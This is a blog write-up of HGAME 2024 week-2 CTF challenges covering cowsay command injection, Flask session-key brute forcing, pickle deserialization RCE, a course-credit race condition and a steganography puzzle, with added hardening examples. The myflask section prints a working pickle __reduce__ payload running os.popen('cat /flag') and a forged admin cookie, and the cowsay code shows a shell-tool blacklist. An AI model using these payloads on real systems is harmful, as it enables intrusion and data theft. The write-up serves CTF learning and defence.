HGAME-2024-WEEK-2

WEB

What the cow say?

This challenge was a bit...

At first I tried both SSTI and XSS, and neither worked.

Then I read the writeup, and the answer turned out to be

image-20240215133813401

I was left speechless. Afterwards I took a look at the source code:

from flask import Flask, render_template, request, redirect, url_for
import subprocess

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
    result = None
    if request.method == 'POST':
        user_input = request.form['user_input']
        result = run_cowsay(user_input)
    return render_template('index.html', result=result)

@app.route('/post', methods=['POST'])
def post():
    if request.method == 'POST':
        user_input = request.form['user_input']
        result = run_cowsay(user_input)
        return render_template('index.html', result=result)

def run_cowsay(text):
    try:
        if (waf(text)):
            # user input is concatenated straight into a command line and handed to /bin/sh
            cmd_output = subprocess.check_output('cowsay ' + text, text=True, stderr=subprocess.STDOUT, shell=True)
            return cmd_output.strip()
        else:
            cmd_output = subprocess.check_output('cowsay Waf!',
                                                 text=True, stderr=subprocess.STDOUT,
                                                 shell=True)
            return cmd_output.strip()

    except subprocess.CalledProcessError as e:
        return run_cowsay("ERROR!")

def waf(string):
    # substring blacklist: any match blocks the input
    blacklist = ['echo', 'cat', 'tee', ';', '|', '&', '<', '>', '\\', 'flag']
    for black in blacklist:
        if (black in string):
            return False
    return True

if __name__ == '__main__': app.run("0.0.0.0", port=80)


and there it was: shell=True, with the user's text concatenated into the command string, so the blacklist is the only thing between the input and the shell.
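For comparison, here is how the same cowsay wrapper looks without the shell. This is an added example, not code from the challenge or the writeup: build_shell_command only reproduces the string concatenation from the source for contrast, while run_with_stdin uses a fixed argv list and feeds the untrusted text on stdin (cowsay reads its message from stdin when none is given on the command line), so no character in the text can ever become a second command or an extra option. The argv list is a parameter so the function can be exercised with cat when cowsay is not installed.

```python
import subprocess

MAX_MESSAGE_LEN = 200  # constructed limit for the demo

def build_shell_command(text: str) -> str:
    """The challenge's pattern: plain concatenation. Returned for inspection only,
    never executed here; with shell=True /bin/sh would parse this whole string."""
    return "cowsay " + text

def run_with_stdin(argv: list, text: str, timeout: float = 5.0) -> str:
    """Hardened pattern: no shell, fixed argv, untrusted text delivered on stdin.
    Metacharacters in `text` are just bytes to the child process."""
    if len(text) > MAX_MESSAGE_LEN:
        raise ValueError("message too long")
    proc = subprocess.run(
        argv,
        input=text,
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )
    if proc.returncode != 0:
        # mirror the original's behaviour of replacing failures with a fixed string
        return "ERROR!"
    return proc.stdout.strip()

def run_cowsay_safe(text: str) -> str:
    # cowsay prints whatever arrives on stdin inside the speech bubble
    return run_with_stdin(["cowsay"], text)

if __name__ == "__main__":
    sample = "hello; $(date)"  # constructed input containing shell syntax
    print("shell would see :", build_shell_command(sample))
    print("cat echoes back :", run_with_stdin(["cat"], sample))
```

With cat as the stand-in program the output is exactly the input text, shell syntax included, which is the whole point: the child never sees a shell. A blacklist like waf() can stay as defence in depth, but it is no longer what holds the line.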

myflask

The challenge provides the source:

import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])

    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data = base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata = pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'

if __name__ == '__main__':
    app.run(debug=True, host="0.0.0.0")

As you can see there are two steps: first forge the Flask session, then get RCE through pickle deserialization.

Step one first:

app.config['SECRET_KEY'] = currentTime

The session key is derived from the current time (HHMMSS), and that time is the moment your container was started, so we can generate a small dictionary of candidate keys and brute-force it:

def generate_combinations():
    combinations = []
    for i in range(112600, 112800):
        combinations.append(str(i))
    return combinations

def save_to_file(combinations):
    with open("dict.txt", "w") as file:
        for combination in combinations:
            file.write("'" + combination + "'" + "\n")

if __name__ == "__main__":
    all_combinations = generate_combinations()
    save_to_file(all_combinations)

This gives:

image-20240208150138874

Then brute-force it:

image-20240208150214330

The content of cookie.txt is the session value from the Cookie request header. The brute force recovers the key 112716. The challenge wants us logged in as admin, so we use that key to forge an admin session:

image-20240208150349749

Result: eyJ1c2VybmFtZSI6ImFkbWluIn0.ZcRUbg.XOTr5m3BdA23sqIHWd5tSSmW35s
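The root cause of step one is a secret that lives in a keyspace of 24*60*60 values. Here is an added example (my own code, not from the challenge) of the kind of startup check that would have refused to run with such a key: it measures the HHMMSS keyspace, generates a proper key from the OS CSPRNG, and rejects anything short or purely numeric before Flask gets to sign a single cookie. The env dict is passed in instead of reading os.environ directly so the check can be exercised offline; the 32-byte minimum is my assumption, not a Flask requirement.

```python
import math
import secrets

# SECRET_KEY = strftime("%H%M%S") can only take this many values
HHMMSS_KEYSPACE = 24 * 60 * 60

MIN_KEY_BYTES = 32  # assumed policy for this demo

def keyspace_bits(keyspace: int) -> float:
    """Effective entropy of a key drawn from `keyspace` equally likely values."""
    return math.log2(keyspace)

def is_strong_secret_key(key) -> bool:
    """Reject keys that are short or purely numeric (timestamps, PIDs, ports
    and similar runtime-derived values all fail here)."""
    if isinstance(key, str):
        key = key.encode()
    if not isinstance(key, (bytes, bytearray)):
        return False
    if len(key) < MIN_KEY_BYTES:
        return False
    if key.isdigit():
        return False
    return True

def generate_secret_key() -> str:
    """256 bits from the OS CSPRNG, to be stored in an env var or secret store
    rather than derived at runtime."""
    return secrets.token_hex(32)

def load_secret_key(env: dict) -> str:
    """Read SECRET_KEY from `env` and refuse to start on a missing or weak one."""
    key = env.get("SECRET_KEY")
    if key is None:
        raise RuntimeError("SECRET_KEY is not set")
    if not is_strong_secret_key(key):
        raise RuntimeError("SECRET_KEY is too weak to sign sessions with")
    return key

if __name__ == "__main__":
    print(f"HHMMSS keyspace: {HHMMSS_KEYSPACE} values "
          f"= {keyspace_bits(HHMMSS_KEYSPACE):.1f} bits")
    print("example key:", generate_secret_key())
    try:
        load_secret_key({"SECRET_KEY": "112716"})  # the key recovered above
    except RuntimeError as e:
        print("rejected:", e)
```

Roughly 16 bits of entropy is why a 200-entry dictionary around the container start time was enough; a 256-bit key makes the same brute force meaningless, and the check makes sure nobody quietly ships the weak one.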

Then step two: pickle deserialization RCE. I'm not very good at this and couldn't get a reverse shell, so I used the debug-mode error page to echo back the result of the pickle payload. The code that generates the exploit is as follows:

import pickle
import base64
import os

class Email():
    email = "admin@admin.com"

    def __reduce__(self):
        return (exec, ("raise Exception(__import__('os').popen('cat /flag').read())",))


poc = base64.b64encode(pickle.dumps(Email()))
print(poc)

Output: b'gASVVwAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIw7cmFpc2UgRXhjZXB0aW9uKF9faW1wb3J0X18oJ29zJykucG9wZW4oJ2NhdCAvZmxhZycpLnJlYWQoKSmUhZRSlC4='

Next, straight into Burp:

image-20240208150642974

Flag: hgame{a0fdd637de4a910d01a24a04ac25843cb7d96219}
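Step two works because pickle.loads will import and call any global the stream names, which is exactly what __reduce__ above relies on. As an added example (not part of the challenge or this writeup), here is the restricted-unpickler pattern from the Python documentation applied to the /flag route's data: find_class is overridden so only an explicit allowlist of globals can be resolved, and anything else raises UnpicklingError before it is called. The RemoteCall class is a constructed test object whose __reduce__ asks for the harmless os.getcwd, just to show the same mechanism being blocked.

```python
import io
import os
import pickle

# Allowlist of (module, name) pairs the unpickler may resolve; everything else is refused.
SAFE_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("collections", "OrderedDict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that cannot resolve arbitrary callables."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class RemoteCall:
    """Constructed test object: its __reduce__ makes the unpickler call os.getcwd.
    Harmless, but it is the same trick the challenge payload uses with exec."""
    def __reduce__(self):
        return (os.getcwd, ())

def benign_sample() -> bytes:
    # plain data, the only thing a userdata field should ever contain
    return pickle.dumps({"username": "guest", "courses": ["ctf101"]})

def call_sample() -> bytes:
    return pickle.dumps(RemoteCall())

def try_load(data: bytes):
    """Return ("ok", value) or ("rejected", reason) instead of letting the stream run code."""
    try:
        return ("ok", restricted_loads(data))
    except pickle.UnpicklingError as e:
        return ("rejected", str(e))

if __name__ == "__main__":
    print(try_load(benign_sample()))
    print(try_load(call_sample()))
```

The better fix for a field like userdata is not to accept pickle from the client at all and use JSON instead; the allowlist is for the cases where the format cannot be changed, and note that it must stay tiny, since any allowed global that can reach a callable reopens the hole.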

Select More Courses

Step one: brute-force the password in Burp with the dictionary given in the hint, then log in.

image-20240211131155114

There are two options, and to select a course you first have to extend your credits.

image-20240211131240793

We use Burp to keep resending the request generated by clicking "Apply":

image-20240211131354970

image-20240211131416244

Click Start attack.

At the same time, go and select the course on the website:

image-20240211131504130

You can see the course selection succeeded:

image-20240211131518281

hgame{5ak_p45sW0rD_&_r4Ce_c0nDiT10n}
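The second half of this challenge is a check-then-act race: the credit check and the deduction are not one atomic step, so parallel requests can all pass the check before any of them deducts. Since the challenge's server code is not shown, here is an added example of my own that models the generic bug and its fix with an in-memory account: enroll_naive checks and then deducts with a deliberate pause in between, enroll_atomic does both under one lock, and simulate hammers either one with a batch of threads. The credit values and worker counts are constructed for the demo.

```python
import threading
import time

class CourseEnrollment:
    """Constructed model of one student's account: `credits` to spend, `enrolled` courses."""
    def __init__(self, credits: int):
        self.credits = credits
        self.enrolled = 0
        self._lock = threading.Lock()

    def enroll_naive(self, cost: int) -> bool:
        # Check-then-act without a lock: another request can pass the check
        # before this one deducts, so the same credits get spent more than once.
        if self.credits >= cost:
            time.sleep(0.01)  # widen the window, like a slow handler or DB round trip
            self.credits -= cost
            self.enrolled += 1
            return True
        return False

    def enroll_atomic(self, cost: int) -> bool:
        # Check and deduct under one lock, so only as many requests win as credits allow.
        with self._lock:
            if self.credits >= cost:
                self.credits -= cost
                self.enrolled += 1
                return True
            return False

def hammer(method, cost: int, workers: int) -> None:
    """Fire `workers` concurrent enrolment requests at `method`."""
    threads = [threading.Thread(target=method, args=(cost,)) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

def simulate(atomic: bool, credits: int = 10, cost: int = 10, workers: int = 20) -> dict:
    acct = CourseEnrollment(credits)
    hammer(acct.enroll_atomic if atomic else acct.enroll_naive, cost, workers)
    return {"enrolled": acct.enrolled, "credits_left": acct.credits}

if __name__ == "__main__":
    print("naive :", simulate(atomic=False))
    print("atomic:", simulate(atomic=True))
```

Run it a few times: the naive account usually ends up enrolled in many courses with credits driven negative, while the atomic one enrols exactly credits // cost times and stops at zero. In a real web app the lock is the database: a single conditional statement such as UPDATE ... SET credits = credits - cost WHERE id = ? AND credits >= cost, with the row count checked, gives the same guarantee across processes, where a Python lock would not.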

MISC

ezWord

Unzipping yields a file called “这是一个word文件” (“this is a Word file”). Open it first; inside there is a PNG. Following the hint, rename it to “这是一个word文件.zip” and extract it:

image-20240212210904382

In this directory we get two images, a zip, and a txt file. Following the hint in the txt, first use the dual-image blind watermark tool in PuzzleSolver to recover the archive password:

image-20240212211010324

Extracting the archive gives a txt file:

image-20240212211047157

It turns out to be a Cardan grille cipher; decode it with the online tool at https://www.spammimic.com/decode.shtml:

image-20240212211215467

which gives:

image-20240212211236874

Then decode it with rot8000:

image-20240212211300032

which gives hgame{0k_you_s0lve_al1_th3_secr3t}


HGAME-2024-WEEK-2
http://www.qetx.top/posts/29928/
Author: Qetx.Jul.27
Published: 14 February 2024
License